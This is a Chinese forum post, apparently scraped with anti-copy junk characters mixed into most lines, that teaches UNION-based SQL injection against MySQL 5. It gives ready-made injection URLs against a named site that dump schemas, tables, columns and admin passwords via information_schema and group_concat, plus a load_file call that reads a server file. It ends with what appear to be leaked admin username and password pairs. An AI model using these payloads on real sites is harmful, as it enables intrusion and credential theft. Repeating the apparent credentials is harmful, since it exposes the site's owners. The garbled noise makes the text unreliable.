此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似2 L) s8 [' S5 U# M. z5 ~1 p
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
( b6 g3 I/ F1 L" O$ G1 l# V i. D+ z! z* F! b$ ^, a
" D" q# C- I7 M$ E优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入0 m7 X, H( t }& x2 M, N8 f
) t) f5 K; p( R) b4 s
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...0 S- @; I$ {7 h, s- V
: J4 K. p7 }7 ?* \# g g, T下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
+ ?1 v6 D ?% ?8 i/ x0 z在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
5 M! V6 L: Q! D, q
d+ S$ H; A: C8 L N% ~http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
& H2 c# o; v+ z$ g; R& A' [2 X# j# g, }+ m( l" x, x' P) `
读出所有库:" Z Z" w( { G1 x
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA9 z' a' {& d* L* D e5 b2 C s
6 o+ @ X2 l+ F7 e3 r2 p
# y1 A1 V4 ^) p) Z
7 ?+ V$ c+ B7 z读出所有表: X! r% o3 b; h; k) v0 s
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
4 u. G9 e! R0 X {) ]: H4 f# C* Q, ?7 O
读出所有表字段:+ v5 I& U. Q1 e& X7 [
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
$ I' C# T. [5 G1 h: y' u*/ (97,100,109,105,110)为admin的ascii码 依次类推
7 Z4 X- A2 A; Z' ?0 e4 C$ w, i
' G- `- \) v4 n7 G读出所有表字段里的内容:' b! v+ {+ ~0 C: h, x" q4 ]' f1 z
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
% g2 _; {# k- f# G
6 L- k( e$ `* C; c& X* x& S h& @9 r0 y: V ?( p
5 e9 K8 p. i; V0 m
; w( C0 n# G7 f! X8 F, I1 A' b, f! E1 S% m" K
% v/ Z$ j/ l; B- b3 |" N" E0 a5 S
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
9 R6 \: B5 f9 w8 }
9 F8 v8 O5 g- A) Q6 ?; ]+ g7 @6 s! E% l! o( X& C. J
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
/ \- N( n7 d& ~( h0 w. i
. z2 H& s+ `- K ohttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
) M9 G$ d" h; [. A# {. s! N9 C4 Z8 \; R; C* G+ q1 W4 q
+ d+ y: L0 {- O& T% B' }, R
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
4 H* Y" I) O# A, ~) h# `* P
8 b+ ~& B/ f7 Z* h7 y
! i/ g( ^2 ~: q webmaster:dzb521123,simlab:simadmin20043233
: D* d% ?# ?$ m |